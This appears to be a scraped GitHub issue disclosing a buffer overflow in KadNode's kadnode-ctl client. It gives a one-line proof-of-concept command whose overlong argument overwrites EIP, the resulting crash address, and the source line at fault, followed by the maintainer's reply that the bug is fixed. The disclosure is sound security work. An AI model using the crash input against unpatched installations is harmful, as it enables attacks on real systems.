Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
A user can overflow the buffer for kadnode-ctl and can control EIP using this. This implies the user can control the execution flow of the program.
kadnode-ctl
Run the following command: ./kadnode-ctl $(python -c "print 'A' * 284 + 'BBBB'")
./kadnode-ctl $(python -c "print 'A' * 284 + 'BBBB'")
This will trigger a SIGSEGV and provide the output 0x42424242 in ?? ()
0x42424242 in ?? ()
The line where this issue occurs is as follows: https://github.com/mwarning/KadNode/blob/master/src/ext-cmd.c#L378
The text was updated successfully, but these errors were encountered:
91b3830
Hi, thanks for reporting the issue. It was sloppy programming on my part. xD The buffer overflow was in the client program part. It doesn't affect the daemon.
Sorry, something went wrong.
No branches or pull requests
The Issue
A user can overflow the buffer for
kadnode-ctland can control EIP using this. This implies the user can control the execution flow of the program.Proof of Concept
Run the following command:
./kadnode-ctl $(python -c "print 'A' * 284 + 'BBBB'")This will trigger a SIGSEGV and provide the output
0x42424242 in ?? ()The line where this issue occurs is as follows:
https://github.com/mwarning/KadNode/blob/master/src/ext-cmd.c#L378
The text was updated successfully, but these errors were encountered: